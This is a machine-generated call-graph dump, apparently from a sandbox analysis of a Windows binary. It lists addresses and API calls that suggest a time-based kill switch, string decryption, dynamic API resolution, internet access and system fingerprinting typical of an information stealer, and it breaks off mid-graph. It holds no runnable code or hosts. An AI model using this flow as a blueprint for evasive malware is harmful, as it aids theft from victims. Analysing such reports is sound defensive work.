13451->13672 13453 74a9c1 lstrlen 13455 74a9e0 13453->13455 13454 74aa18 13673 74a7a0 13454->13673 13455->13454 13457 74a9fa lstrcpy lstrcat 13455->13457 13457->13454 13458 74aa24 13458->13286 13460 74a8bb 13459->13460 13461 74a90b 13460->13461 13462 74a8f9 lstrcpy 13460->13462 13461->13297 13462->13461 13677 746820 13463->13677 13465 74698e 13466 746998 sscanf 13465->13466 13706 74a800 13466->13706 13468 7469aa SystemTimeToFileTime SystemTimeToFileTime 13469 7469e0 13468->13469 13470 7469ce 13468->13470 13472 745b10 13469->13472 13470->13469 13471 7469d8 ExitProcess 13470->13471 13473 745b1d 13472->13473 13474 74a740 lstrcpy 13473->13474 13475 745b2e 13474->13475 13708 74a820 lstrlen 13475->13708 13478 74a820 2 API calls 13479 745b64 13478->13479 13480 74a820 2 API calls 13479->13480 13481 745b74 13480->13481 13712 746430 13481->13712 13484 74a820 2 API calls 13485 745b93 13484->13485 13486 74a820 2 API calls 13485->13486 13487 745ba0 13486->13487 13488 74a820 2 API calls 13487->13488 13489 745bad 13488->13489 13490 74a820 2 API calls 13489->13490 13491 745bf9 13490->13491 13721 7326a0 13491->13721 13499 745cc3 13500 746430 lstrcpy 13499->13500 13501 745cd5 13500->13501 13502 74a7a0 lstrcpy 13501->13502 13503 745cf2 13502->13503 13504 74a9b0 4 API calls 13503->13504 13505 745d0a 13504->13505 13506 74a8a0 lstrcpy 13505->13506 13507 745d16 13506->13507 13508 74a9b0 4 API calls 13507->13508 13509 745d3a 13508->13509 13510 74a8a0 lstrcpy 13509->13510 13511 745d46 13510->13511 13512 74a9b0 4 API calls 13511->13512 13513 745d6a 13512->13513 13514 74a8a0 lstrcpy 13513->13514 13515 745d76 13514->13515 13516 74a740 lstrcpy 13515->13516 13517 745d9e 13516->13517 14447 747500 GetWindowsDirectoryA 13517->14447 13520 74a7a0 lstrcpy 13521 745db8 13520->13521 14457 734880 13521->14457 13523 745dbe 14603 7417a0 13523->14603 13525 745dc6 13526 74a740 lstrcpy 13525->13526 13527 745de9 13526->13527 13528 731590 lstrcpy 13527->13528 13529 745dfd 13528->13529 14619 735960 13529->14619 13531 745e03 14763 741050 13531->14763 13533 745e0e 13534 74a740 lstrcpy 13533->13534 13535 745e32 13534->13535 13536 731590 lstrcpy 13535->13536 13537 745e46 13536->13537 13538 735960 34 API calls 13537->13538 13539 745e4c 13538->13539 14767 740d90 13539->14767 13541 745e57 13542 74a740 lstrcpy 13541->13542 13543 745e79 13542->13543 13544 731590 lstrcpy 13543->13544 13545 745e8d 13544->13545 13546 735960 34 API calls 13545->13546 13547 745e93 13546->13547 14774 740f40 13547->14774 13549 745e9e 13550 731590 lstrcpy 13549->13550 13551 745eb5 13550->13551 14779 741a10 13551->14779 13553 745eba 13554 74a740 lstrcpy 13553->13554 13555 745ed6 13554->13555 15123 734fb0 GetProcessHeap RtlAllocateHeap InternetOpenA 13555->15123 13557 745edb 13558 731590 lstrcpy 13557->13558 13559 745f5b 13558->13559 15130 740740 13559->15130 13561 745f60 13562 74a740 lstrcpy 13561->13562 13563 745f86 13562->13563 13564 731590 lstrcpy 13563->13564 13565 745f9a 13564->13565 13566 735960 34 API calls 13565->13566 13661 7345d1 RtlAllocateHeap 13660->13661 13664 734621 VirtualProtect 13661->13664 13664->13309 13665->13396 13667 7310c2 ctype 13666->13667 13668 7310fd 13667->13668 13669 7310e2 VirtualFree 13667->13669 13668->13426 13669->13668 13671 731233 GlobalMemoryStatusEx 13670->13671 13671->13429 13672->13453 13674 74a7c2 13673->13674 13675 74a7ec 13674->13675 13676 74a7da lstrcpy 13674->13676 13675->13458 13676->13675 13678 74a740 lstrcpy 13677->13678 13679 746833 13678->13679 13680 74a9b0 4 API calls 13679->13680 13681 746845 13680->13681 13682 74a8a0 lstrcpy 13681->13682 13683 74684e 13682->13683 13684 74a9b0 4 API calls 13683->13684 13685 746867 13684->13685 13686 74a8a0 lstrcpy 13685->13686 13687 746870 13686->13687 13688 74a9b0 4 API calls 13687->13688 13689 74688a 13688->13689 13690 74a8a0 lstrcpy 13689->13690 13691 746893 13690->13691 13692 74a9b0 4 API calls 13691->13692 13693 7468ac 13692->13693 13694 74a8a0 lstrcpy 13693->13694 13695 7468b5 13694->13695 13696 74a9b0 4 API calls 13695->13696 13697 7468cf 13696->13697 13698 74a8a0 lstrcpy 13697->13698 13699 7468d8 13698->13699 13700 74a9b0 4 API calls 13699->13700 13701 7468f3 13700->13701 13702 74a8a0 lstrcpy 13701->13702 13703 7468fc 13702->13703 13704 74a7a0 lstrcpy 13703->13704 13705 746910 13704->13705 13705->13465 13707 74a812 13706->13707 13707->13468 13709 74a83f 13708->13709 13710 745b54 13709->13710 13711 74a87b lstrcpy 13709->13711 13710->13478 13711->13710 13713 74a8a0 lstrcpy 13712->13713 13714 746443 13713->13714 13715 74a8a0 lstrcpy 13714->13715 13716 746455 13715->13716 13717 74a8a0 lstrcpy 13716->13717 13718 746467 13717->13718 13719 74a8a0 lstrcpy 13718->13719 13720 745b86 13719->13720 13720->13484 13722 7345c0 2 API calls 13721->13722 13723 7326b4 13722->13723 13724 7345c0 2 API calls 13723->13724 13725 7326d7 13724->13725 13726 7345c0 2 API calls 13725->13726 13727 7326f0 13726->13727 13728 7345c0 2 API calls 13727->13728 13729 732709 13728->13729 13730 7345c0 2 API calls 13729->13730 13731 732736 13730->13731 13732 7345c0 2 API calls 13731->13732 13733 73274f 13732->13733 13734 7345c0 2 API calls 13733->13734 13735 732768 13734->13735 13736 7345c0 2 API calls 13735->13736 13737 732795 13736->13737 13738 7345c0 2 API calls 13737->13738 13739 7327ae 13738->13739 13740 7345c0 2 API calls 13739->13740 13741 7327c7 13740->13741 13742 7345c0 2 API calls 13741->13742 13743 7327e0 13742->13743 13744 7345c0 2 API calls 13743->13744 13745 7327f9 13744->13745 13746 7345c0 2 API calls 13745->13746 13747 732812 13746->13747 13748 7345c0 2 API calls 13747->13748 13749 73282b 13748->13749 13750 7345c0 2 API calls 13749->13750 13751 732844 13750->13751 13752 7345c0 2 API calls 13751->13752 13753 73285d 13752->13753 13754 7345c0 2 API calls 13753->13754 13755 732876 13754->13755 13756 7345c0 2 API calls 13755->13756 13757 73288f 13756->13757 13758 7345c0 2 API calls 13757->13758 13759 7328a8 13758->13759 13760 7345c0 2 API calls 13759->13760 13761 7328c1 13760->13761 13762 7345c0 2 API calls 13761->13762 13763 7328da 13762->13763 13764 7345c0 2 API calls 13763->13764 13765 7328f3 13764->13765 13766 7345c0 2 API calls 13765->13766 13767 73290c 13766->13767 13768 7345c0 2 API calls 13767->13768 13769 732925 13768->13769 13770 7345c0 2 API calls 13769->13770 13771 73293e 13770->13771 13772 7345c0 2 API calls 13771->13772 13773 732957 13772->13773 13774 7345c0 2 API calls 13773->13774 13775 732970 13774->13775 13776 7345c0 2 API calls 13775->13776 13777 732989 13776->13777 13778 7345c0 2 API calls 13777->13778 13779 7329a2 13778->13779 13780 7345c0 2 API calls 13779->13780 13781 7329bb 13780->13781 13782 7345c0 2 API calls 13781->13782 13783 7329d4 13782->13783 13784 7345c0 2 API calls 13783->13784 13785 7329ed 13784->13785 13786 7345c0 2 API calls 13785->13786 13787 732a06 13786->13787 13788 7345c0 2 API calls 13787->13788 13789 732a1f 13788->13789 13790 7345c0 2 API calls 13789->13790 13791 732a38 13790->13791 13792 7345c0 2 API calls 13791->13792 13793 732a51 13792->13793 13794 7345c0 2 API calls 13793->13794 13795 732a6a 13794->13795 13796 7345c0 2 API calls 13795->13796 13797 732a83 13796->13797 13798 7345c0 2 API calls 13797->13798 13799 732a9c 13798->13799 13800 7345c0 2 API calls 13799->13800 13801 732ab5 13800->13801 13802 7345c0 2 API calls 13801->13802 13803 732ace 13802->13803 13804 7345c0 2 API calls 13803->13804 13805 732ae7 13804->13805 13806 7345c0 2 API calls 13805->13806 13807 732b00 13806->13807 13808 7345c0 2 API calls 13807->13808 13809 732b19 13808->13809 13810 7345c0 2 API calls 13809->13810 13811 732b32 13810->13811 13812 7345c0 2 API calls 13811->13812 13813 732b4b 13812->13813 13814 7345c0 2 API calls 13813->13814 13815 732b64 13814->13815 13816 7345c0 2 API calls 13815->13816 13817 732b7d 13816->13817 13818 7345c0 2 API calls 13817->13818 13819 732b96 13818->13819 13820 7345c0 2 API calls 13819->13820 13821 732baf 13820->13821 13822 7345c0 2 API calls 13821->13822 13823 732bc8 13822->13823 13824 7345c0 2 API calls 13823->13824 13825 732be1 13824->13825 13826 7345c0 2 API calls 13825->13826 13827 732bfa 13826->13827 13828 7345c0 2 API calls 13827->13828 13829 732c13 13828->13829 13830 7345c0 2 API calls 13829->13830 13831 732c2c 13830->13831 13832 7345c0 2 API calls 13831->13832 13833 732c45 13832->13833 13834 7345c0 2 API calls 13833->13834 13835 732c5e 13834->13835 13836 7345c0 2 API calls 13835->13836 13837 732c77 13836->13837 13838 7345c0 2 API calls 13837->13838 13839 732c90 13838->13839 13840 7345c0 2 API calls 13839->13840 13841 732ca9 13840->13841 13842 7345c0 2 API calls 13841->13842 13843 732cc2 13842->13843 13844 7345c0 2 API calls 13843->13844 13845 732cdb 13844->13845 13846 7345c0 2 API calls 13845->13846 13847 732cf4 13846->13847 13848 7345c0 2 API calls 13847->13848 13849 732d0d 13848->13849 13850 7345c0 2 API calls 13849->13850 13851 732d26 13850->13851 13852 7345c0 2 API calls 13851->13852 13853 732d3f 13852->13853 13854 7345c0 2 API calls 13853->13854 13855 732d58 13854->13855 13856 7345c0 2 API calls 13855->13856 13857 732d71 13856->13857 13858 7345c0 2 API calls 13857->13858 13859 732d8a 13858->13859 13860 7345c0 2 API calls 13859->13860 13861 732da3 13860->13861 13862 7345c0 2 API calls 13861->13862 13863 732dbc 13862->13863 13864 7345c0 2 API calls 13863->13864 13865 732dd5 13864->13865 13866 7345c0 2 API calls 13865->13866 13867 732dee 13866->13867 13868 7345c0 2 API calls 13867->13868 13869 732e07 13868->13869 13870 7345c0 2 API calls 13869->13870 13871 732e20 13870->13871 13872 7345c0 2 API calls 13871->13872 13873 732e39 13872->13873 13874 7345c0 2 API calls 13873->13874 13875 732e52 13874->13875 13876 7345c0 2 API calls 13875->13876 13877 732e6b 13876->13877 13878 7345c0 2 API calls 13877->13878 13879 732e84 13878->13879 13880 7345c0 2 API calls 13879->13880 13881 732e9d 13880->13881 13882 7345c0 2 API calls 13881->13882 13883 732eb6 13882->13883 13884 7345c0 2 API calls 13883->13884 13885 732ecf 13884->13885 13886 7345c0 2 API calls 13885->13886 13887 732ee8 13886->13887 13888 7345c0 2 API calls 13887->13888 13889 732f01 13888->13889 13890 7345c0 2 API calls 13889->13890 13891 732f1a 13890->13891 13892 7345c0 2 API calls 13891->13892 13893 732f33 13892->13893 13894 7345c0 2 API calls 13893->13894 13895 732f4c 13894->13895 13896 7345c0 2 API calls 13895->13896 13897 732f65 13896->13897 13898 7345c0 2 API calls 13897->13898 13899 732f7e 13898->13899 13900 7345c0 2 API calls 13899->13900 13901 732f97 13900->13901 13902 7345c0 2 API calls 13901->13902 13903 732fb0 13902->13903 13904 7345c0 2 API calls 13903->13904 13905 732fc9 13904->13905 13906 7345c0 2 API calls 13905->13906 13907 732fe2 13906->13907 13908 7345c0 2 API calls 13907->13908 13909 732ffb 13908->13909 13910 7345c0 2 API calls 13909->13910 13911 733014 13910->13911 13912 7345c0 2 API calls 13911->13912 13913 73302d 13912->13913 13914 7345c0 2 API calls 13913->13914 13915 733046 13914->13915 13916 7345c0 2 API calls 13915->13916 13917 73305f 13916->13917 13918 7345c0 2 API calls 13917->13918 13919 733078 13918->13919 13920 7345c0 2 API calls 13919->13920 13921 733091 13920->13921 13922 7345c0 2 API calls 13921->13922 13923 7330aa 13922->13923 13924 7345c0 2 API calls 13923->13924 13925 7330c3 13924->13925 13926 7345c0 2 API calls 13925->13926 13927 7330dc 13926->13927 13928 7345c0 2 API calls 13927->13928 13929 7330f5 13928->13929 13930 7345c0 2 API calls 13929->13930 13931 73310e 13930->13931 13932 7345c0 2 API calls 13931->13932 13933 733127 13932->13933 13934 7345c0 2 API calls 13933->13934 13935 733140 13934->13935 13936 7345c0 2 API calls 13935->13936 13937 733159 13936->13937 13938 7345c0 2 API calls 13937->13938 13939 733172 13938->13939 13940 7345c0 2 API calls 13939->13940 13941 73318b 13940->13941 13942 7345c0 2 API calls 13941->13942 13943 7331a4 13942->13943 13944 7345c0 2 API calls 13943->13944 13945 7331bd 13944->13945 13946 7345c0 2 API calls 13945->13946 13947 7331d6 13946->13947 13948 7345c0 2 API calls 13947->13948 13949 7331ef 13948->13949 13950 7345c0 2 API calls 13949->13950 13951 733208 13950->13951 13952 7345c0 2 API calls 13951->13952 13953 733221 13952->13953 13954 7345c0 2 API calls 13953->13954 13955 73323a 13954->13955 13956 7345c0 2 API calls 13955->13956 13957 733253 13956->13957 13958 7345c0 2 API calls 13957->13958 13959 73326c 13958->13959 13960 7345c0 2 API calls 13959->13960 13961 733285 13960->13961 13962 7345c0 2 API calls 13961->13962 13963 73329e 13962->13963 13964 7345c0 2 API calls 13963->13964 13965 7332b7 13964->13965 13966 7345c0 2 API calls 13965->13966 13967 7332d0 13966->13967 13968 7345c0 2 API calls 13967->13968 13969 7332e9 13968->13969 13970 7345c0 2 API calls 13969->13970 13971 733302 13970->13971 13972 7345c0 2 API calls 13971->13972 13973 73331b 13972->13973 13974 7345c0 2 API calls 13973->13974 13975 733334 13974->13975 13976 7345c0 2 API calls 13975->13976 13977 73334d 13976->13977 13978 7345c0 2 API calls 13977->13978 13979 733366 13978->13979 13980 7345c0 2 API calls 13979->13980 13981 73337f 13980->13981 13982 7345c0 2 API calls 13981->13982 13983 733398 13982->13983 13984 7345c0 2 API calls 13983->13984 13985 7333b1 13984->13985 13986 7345c0 2 API calls 13985->13986 13987 7333ca 13986->13987 13988 7345c0 2 API calls 13987->13988 13989 7333e3 13988->13989 13990 7345c0 2 API calls 13989->13990 13991 7333fc 13990->13991 13992 7345c0 2 API calls 13991->13992 13993 733415 13992->13993 13994 7345c0 2 API calls 13993->13994 13995 73342e 13994->13995 13996 7345c0 2 API calls 13995->13996 13997 733447 13996->13997 13998 7345c0 2 API calls 13997->13998 13999 733460 13998->13999 14000 7345c0 2 API calls 13999->14000 14001 733479 14000->14001 14002 7345c0 2 API calls 14001->14002 14003 733492 14002->14003 14004 7345c0 2 API calls 14003->14004 14005 7334ab 14004->14005 14006 7345c0 2 API calls 14005->14006 14007 7334c4 14006->14007 14008 7345c0 2 API calls 14007->14008 14009 7334dd 14008->14009 14010 7345c0 2 API calls 14009->14010 14011 7334f6 14010->14011 14012 7345c0 2 API calls 14011->14012 14013 73350f 14012->14013 14014 7345c0 2 API calls 14013->14014 14015 733528 14014->14015 14016 7345c0 2 API calls 14015->14016 14017 733541 14016->14017 14018 7345c0 2 API calls 14017->14018 14019 73355a 14018->14019 14020 7345c0 2 API calls 14019->14020 14021 733573 14020->14021 14022 7345c0 2 API calls 14021->14022 14023 73358c 14022->14023 14024 7345c0 2 API calls 14023->14024 14025 7335a5 14024->14025 14026 7345c0 2 API calls 14025->14026 14027 7335be 14026->14027 14028 7345c0 2 API calls 14027->14028 14029 7335d7 14028->14029 14030 7345c0 2 API calls 14029->14030 14031 7335f0 14030->14031 14032 7345c0 2 API calls 14031->14032 14033 733609 14032->14033 14034 7345c0 2 API calls 14033->14034 14035 733622 14034->14035 14036 7345c0 2 API calls 14035->14036 14037 73363b 14036->14037 14038 7345c0 2 API calls 14037->14038 14039 733654 14038->14039 14040 7345c0 2 API calls 14039->14040 14041 73366d 14040->14041 14042 7345c0 2 API calls 14041->14042 14043 733686 14042->14043 14044 7345c0 2 API calls 14043->14044 14045 73369f 14044->14045 14046 7345c0 2 API calls 14045->14046 14047 7336b8 14046->14047 14048 7345c0 2 API calls 14047->14048 14049 7336d1 14048->14049 14050 7345c0 2 API calls 14049->14050 14051 7336ea 14050->14051 14052 7345c0 2 API calls 14051->14052 14053 733703 14052->14053 14054 7345c0 2 API calls 14053->14054 14055 73371c 14054->14055 14056 7345c0 2 API calls 14055->14056 14057 733735 14056->14057 14058 7345c0 2 API calls 14057->14058 14059 73374e 14058->14059 14060 7345c0 2 API calls 14059->14060 14061 733767 14060->14061 14062 7345c0 2 API calls 14061->14062 14063 733780 14062->14063 14064 7345c0 2 API calls 14063->14064 14065 733799 14064->14065 14066 7345c0 2 API calls 14065->14066 14067 7337b2 14066->14067 14068 7345c0 2 API calls 14067->14068 14069 7337cb 14068->14069 14070 7345c0 2 API calls 14069->14070 14071 7337e4 14070->14071 14072 7345c0 2 API calls 14071->14072 14073 7337fd 14072->14073 14074 7345c0 2 API calls 14073->14074 14075 733816 14074->14075 14076 7345c0 2 API calls 14075->14076 14077 73382f 14076->14077 14078 7345c0 2 API calls 14077->14078 14079 733848 14078->14079 14080 7345c0 2 API calls 14079->14080 14081 733861 14080->14081 14082 7345c0 2 API calls 14081->14082 14083 73387a 14082->14083 14084 7345c0 2 API calls 14083->14084 14085 733893 14084->14085 14086 7345c0 2 API calls 14085->14086 14087 7338ac 14086->14087 14088 7345c0 2 API calls 14087->14088 14089 7338c5 14088->14089 14090 7345c0 2 API calls 14089->14090 14091 7338de 14090->14091 14092 7345c0 2 API calls 14091->14092 14093 7338f7 14092->14093 14094 7345c0 2 API calls 14093->14094 14095 733910 14094->14095 14096 7345c0 2 API calls 14095->14096 14097 733929 14096->14097 14098 7345c0 2 API calls 14097->14098 14099 733942 14098->14099 14100 7345c0 2 API calls 14099->14100 14101 73395b 14100->14101 14102 7345c0 2 API calls 14101->14102 14103 733974 14102->14103 14104 7345c0 2 API calls 14103->14104 14105 73398d 14104->14105 14106 7345c0 2 API calls 14105->14106 14107 7339a6 14106->14107 14108 7345c0 2 API calls 14107->14108 14109 7339bf 14108->14109 14110 7345c0 2 API calls 14109->14110 14111 7339d8 14110->14111 14112 7345c0 2 API calls 14111->14112 14113 7339f1 14112->14113 14114 7345c0 2 API calls 14113->14114 14115 733a0a 14114->14115 14116 7345c0 2 API calls 14115->14116 14117 733a23 14116->14117 14118 7345c0 2 API calls 14117->14118 14119 733a3c 14118->14119 14120 7345c0 2 API calls 14119->14120 14121 733a55 14120->14121 14122 7345c0 2 API calls 14121->14122 14123 733a6e 14122->14123 14124 7345c0 2 API calls 14123->14124 14125 733a87 14124->14125 14126 7345c0 2 API calls 14125->14126 14127 733aa0 14126->14127 14128 7345c0 2 API calls 14127->14128 14129 733ab9 14128->14129 14130 7345c0 2 API calls 14129->14130 14131 733ad2 14130->14131 14132 7345c0 2 API calls 14131->14132 14133 733aeb 14132->14133 14134 7345c0 2 API calls 14133->14134 14135 733b04 14134->14135 14136 7345c0 2 API calls 14135->14136 14137 733b1d 14136->14137 14138 7345c0 2 API calls 14137->14138 14139 733b36 14138->14139 14140 7345c0 2 API calls 14139->14140 14141 733b4f 14140->14141 14142 7345c0 2 API calls 14141->14142 14143 733b68 14142->14143 14144 7345c0 2 API calls 14143->14144 14145 733b81 14144->14145 14146 7345c0 2 API calls 14145->14146 14147 733b9a 14146->14147 14148 7345c0 2 API calls 14147->14148 14149 733bb3 14148->14149 14150 7345c0 2 API calls 14149->14150 14151 733bcc 14150->14151 14152 7345c0 2 API calls 14151->14152 14153 733be5 14152->14153 14154 7345c0 2 API calls 14153->14154 14155 733bfe 14154->14155 14156 7345c0 2 API calls 14155->14156 14157 733c17 14156->14157 14158 7345c0 2 API calls 14157->14158 14159 733c30 14158->14159 14160 7345c0 2 API calls 14159->14160 14161 733c49 14160->14161 14162 7345c0 2 API calls 14161->14162 14163 733c62 14162->14163 14164 7345c0 2 API calls 14163->14164 14165 733c7b 14164->14165 14166 7345c0 2 API calls 14165->14166 14167 733c94 14166->14167 14168 7345c0 2 API calls 14167->14168 14169 733cad 14168->14169 14170 7345c0 2 API calls 14169->14170 14171 733cc6 14170->14171 14172 7345c0 2 API calls 14171->14172 14173 733cdf 14172->14173 14174 7345c0 2 API calls 14173->14174 14175 733cf8 14174->14175 14176 7345c0 2 API calls 14175->14176 14177 733d11 14176->14177 14178 7345c0 2 API calls 14177->14178 14179 733d2a 14178->14179 14180 7345c0 2 API calls 14179->14180 14181 733d43 14180->14181 14182 7345c0 2 API calls 14181->14182 14183 733d5c 14182->14183 14184 7345c0 2 API calls 14183->14184 14185 733d75 14184->14185 14186 7345c0 2 API calls 14185->14186 14187 733d8e 14186->14187 14188 7345c0 2 API calls 14187->14188 14189 733da7 14188->14189 14190 7345c0 2 API calls 14189->14190 14191 733dc0 14190->14191 14192 7345c0 2 API calls 14191->14192 14193 733dd9 14192->14193 14194 7345c0 2 API calls 14193->14194 14195 733df2 14194->14195 14196 7345c0 2 API calls 14195->14196 14197 733e0b 14196->14197 14198 7345c0 2 API calls 14197->14198 14199 733e24 14198->14199 14200 7345c0 2 API calls 14199->14200 14201 733e3d 14200->14201 14202 7345c0 2 API calls 14201->14202 14203 733e56 14202->14203 14204 7345c0 2 API calls 14203->14204 14205 733e6f 14204->14205 14206 7345c0 2 API calls 14205->14206 14207 733e88 14206->14207 14208 7345c0 2 API calls 14207->14208 14209 733ea1 14208->14209 14210 7345c0 2 API calls 14209->14210 14211 733eba 14210->14211 14212 7345c0 2 API calls 14211->14212 14213 733ed3 14212->14213 14214 7345c0 2 API calls 14213->14214 14215 733eec 14214->14215 14216 7345c0 2 API calls 14215->14216 14217 733f05 14216->14217 14218 7345c0 2 API calls 14217->14218 14219 733f1e 14218->14219 14220 7345c0 2 API calls 14219->14220 14221 733f37 14220->14221 14222 7345c0 2 API calls 14221->14222 14223 733f50 14222->14223 14224 7345c0 2 API calls 14223->14224 14225 733f69 14224->14225 14226 7345c0 2 API calls 14225->14226 14227 733f82 14226->14227 14228 7345c0 2 API calls 14227->14228 14229 733f9b 14228->14229 14230 7345c0 2 API calls 14229->14230 14231 733fb4 14230->14231 14232 7345c0 2 API calls 14231->14232 14233 733fcd 14232->14233 14234 7345c0 2 API calls 14233->14234 14235 733fe6 14234->14235 14236 7345c0 2 API calls 14235->14236 14237 733fff 14236->14237 14238 7345c0 2 API calls 14237->14238 14239 734018 14238->14239 14240 7345c0 2 API calls 14239->14240 14241 734031 14240->14241 14242 7345c0 2 API calls 14241->14242 14243 73404a 14242->14243 14244 7345c0 2 API calls 14243->14244 14245 734063 14244->14245 14246 7345c0 2 API calls 14245->14246 14247 73407c 14246->14247 14248 7345c0 2 API calls 14247->14248 14249 734095 14248->14249 14250 7345c0 2 API calls 14249->14250 14251 7340ae 14250->14251 14252 7345c0 2 API calls 14251->14252 14253 7340c7 14252->14253 14254 7345c0 2 API calls 14253->14254 14255 7340e0 14254->14255 14256 7345c0 2 API calls 14255->14256 14257 7340f9 14256->14257 14258 7345c0 2 API calls 14257->14258 14259 734112 14258->14259 14260 7345c0 2 API calls 14259->14260 14261 73412b 14260->14261 14262 7345c0 2 API calls 14261->14262 14263 734144 14262->14263 14264 7345c0 2 API calls 14263->14264 14265 73415d 14264->14265 14266 7345c0 2 API calls 14265->14266 14267 734176 14266->14267 14268 7345c0 2 API calls 14267->14268 14269 73418f 14268->14269 14270 7345c0 2 API calls 14269->14270 14271 7341a8 14270->14271 14272 7345c0 2 API calls 14271->14272 14273 7341c1 14272->14273 14274 7345c0 2 API calls 14273->14274 14275 7341da 14274->14275 14276 7345c0 2 API calls 14275->14276 14277 7341f3 14276->14277 14278 7345c0 2 API calls 14277->14278 14279 73420c 14278->14279 14280 7345c0 2 API calls 14279->14280 14281 734225 14280->14281 14282 7345c0 2 API calls 14281->14282 14283 73423e 14282->14283 14284 7345c0 2 API calls 14283->14284 14285 734257 14284->14285 14286 7345c0 2 API calls 14285->14286 14287 734270 14286->14287 14288 7345c0 2 API calls 14287->14288 14289 734289 14288->14289 14290 7345c0 2 API calls 14289->14290 14291 7342a2 14290->14291 14292 7345c0 2 API calls 14291->14292 14293 7342bb 14292->14293 14294 7345c0 2 API calls 14293->14294 14295 7342d4 14294->14295 14296 7345c0 2 API calls 14295->14296 14297 7342ed 14296->14297 14298 7345c0 2 API calls 14297->14298 14299 734306 14298->14299 14300 7345c0 2 API calls 14299->14300 14301 73431f 14300->14301 14302 7345c0 2 API calls 14301->14302 14303 734338 14302->14303 14304 7345c0 2 API calls 14303->14304 14305 734351 14304->14305 14306 7345c0 2 API calls 14305->14306 14307 73436a 14306->14307 14308 7345c0 2 API calls 14307->14308 14309 734383 14308->14309 14310 7345c0 2 API calls 14309->14310 14311 73439c 14310->14311 14312 7345c0 2 API calls 14311->14312 14313 7343b5 14312->14313 14314 7345c0 2 API calls 14313->14314 14315 7343ce 14314->14315 14316 7345c0 2 API calls 14315->14316 14317 7343e7 14316->14317 14318 7345c0 2 API calls 14317->14318 14319 734400 14318->14319 14320 7345c0 2 API calls 14319->14320 14321 734419 14320->14321 14322 7345c0 2 API calls 14321->14322 14323 734432 14322->14323 14324 7345c0 2 API calls 14323->14324 14325 73444b 14324->14325 14326 7345c0 2 API calls 14325->14326 14327 734464 14326->14327 14328 7345c0 2 API calls 14327->14328 14329 73447d 14328->14329 14330 7345c0 2 API calls 14329->14330 14331 734496 14330->14331 14332 7345c0 2 API calls 14331->14332 14333 7344af 14332->14333 14334 7345c0 2 API calls 14333->14334 14335 7344c8 14334->14335 14336 7345c0 2 API calls 14335->14336 14337 7344e1 14336->14337 14338 7345c0 2 API calls 14337->14338 14339 7344fa 14338->14339 14340 7345c0 2 API calls 14339->14340 14341 734513 14340->14341 14342 7345c0 2 API calls 14341->14342 14343 73452c 14342->14343 14344 7345c0 2 API calls 14343->14344 14345 734545 14344->14345 14346 7345c0 2 API calls 14345->14346 14347 73455e 14346->14347 14348 7345c0 2 API calls 14347->14348 14349 734577 14348->14349 14350 7345c0 2 API calls 14349->14350 14351 734590 14350->14351 14352 7345c0 2 API calls 14351->14352 14353 7345a9 14352->14353 14354 749c10 14353->14354 14355 74a036 8 API calls 14354->14355 14356 749c20 43 API calls 14354->14356 14357 74a146 14355->14357 14358 74a0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14355->14358 14356->14355 14359 74a216 14357->14359 14360 74a153 8 API calls 14357->14360 14358->14357 14361 74a21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14359->14361 14362 74a298 14359->14362 14360->14359 14361->14362 14363 74a2a5 6 API calls 14362->14363 14364 74a337 14362->14364 14363->14364 14365 74a344 9 API calls 14364->14365 14366 74a41f 14364->14366 14365->14366 14367 74a4a2 14366->14367 14368 74a428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14366->14368 14369 74a4dc 14367->14369 14370 74a4ab GetProcAddress GetProcAddress 14367->14370 14368->14367 14371 74a515 14369->14371 14372 74a4e5 GetProcAddress GetProcAddress 14369->14372 14370->14369 14373 74a612 14371->14373 14374 74a522 10 API calls 14371->14374 14372->14371 14375 74a67d 14373->14375 14376 74a61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14373->14376 14374->14373 14377 74a686 GetProcAddress 14375->14377 14378 74a69e 14375->14378 14376->14375 14377->14378 14379 74a6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14378->14379 14380 745ca3 14378->14380 14379->14380 14381 731590 14380->14381 15503 731670 14381->15503 14384 74a7a0 lstrcpy 14385 7315b5 14384->14385 14386 74a7a0 lstrcpy 14385->14386 14387 7315c7 14386->14387 14388 74a7a0 lstrcpy 14387->14388 14389 7315d9 14388->14389 14390 74a7a0 lstrcpy 14389->14390 14391 731663 14390->14391 14392 745510 14391->14392 14393 745521 14392->14393 14394 74a820 2 API calls 14393->14394 14395 74552e 14394->14395 14396 74a820 2 API calls 14395->14396 14397 74553b 14396->14397 14398 74a820 2 API calls 14397->14398 14399 745548 14398->14399 14400 74a740 lstrcpy 14399->14400 14401 745555 14400->14401 14402 74a740 lstrcpy 14401->14402 14403 745562 14402->14403 14404 74a740 lstrcpy 14403->14404 14405 74556f 14404->14405 14406 74a740 lstrcpy 14405->14406 14425 74557c 14406->14425 14407 731590 lstrcpy 14407->14425 14408 7452c0 25 API calls 14408->14425 14409 745643 StrCmpCA 14409->14425 14410 7456a0 StrCmpCA 14411 7457dc 14410->14411 14410->14425 14412 74a8a0 lstrcpy 14411->14412 14413 7457e8 14412->14413 14416 74a820 2 API calls 14413->14416 14414 74a740 lstrcpy 14414->14425 14415 74a820 lstrlen lstrcpy 14415->14425 14418 7457f6 14416->14418 14417 745856 StrCmpCA 14419 745991 14417->14419 14417->14425 14420 74a820 2 API calls 14418->14420 14422 74a8a0 lstrcpy 14419->14422 14421 745805 14420->14421 14423 731670 lstrcpy 14421->14423 14424 74599d 14422->14424 14445 745811 14423->14445 14426 74a820 2 API calls 14424->14426 14425->14407 14425->14408 14425->14409 14425->14410 14425->14414 14425->14415 14425->14417 14427 745a0b StrCmpCA 14425->14427 14438 7451f0 20 API calls 14425->14438 14441 74578a StrCmpCA 14425->14441 14443 74593f StrCmpCA 14425->14443 14444 74a7a0 lstrcpy 14425->14444 14446 74a8a0 lstrcpy 14425->14446 14428 7459ab 14426->14428 14430 745a16 Sleep 14427->14430 14431 745a28 14427->14431 14429 74a820 2 API calls 14428->14429 14432 7459ba 14429->14432 14430->14425 14433 74a8a0 lstrcpy 14431->14433 14434 731670 lstrcpy 14432->14434 14435 745a34 14433->14435 14434->14445 14436 74a820 2 API calls 14435->14436 14437 745a43 14436->14437 14439 74a820 2 API calls 14437->14439 14438->14425 14440 745a52 14439->14440 14442 731670 lstrcpy 14440->14442 14441->14425 14442->14445 14443->14425 14444->14425 14445->13499 14446->14425 14448 747553 GetVolumeInformationA 14447->14448 14449 74754c 14447->14449 14451 747591 14448->14451 14449->14448 14450 7475fc GetProcessHeap 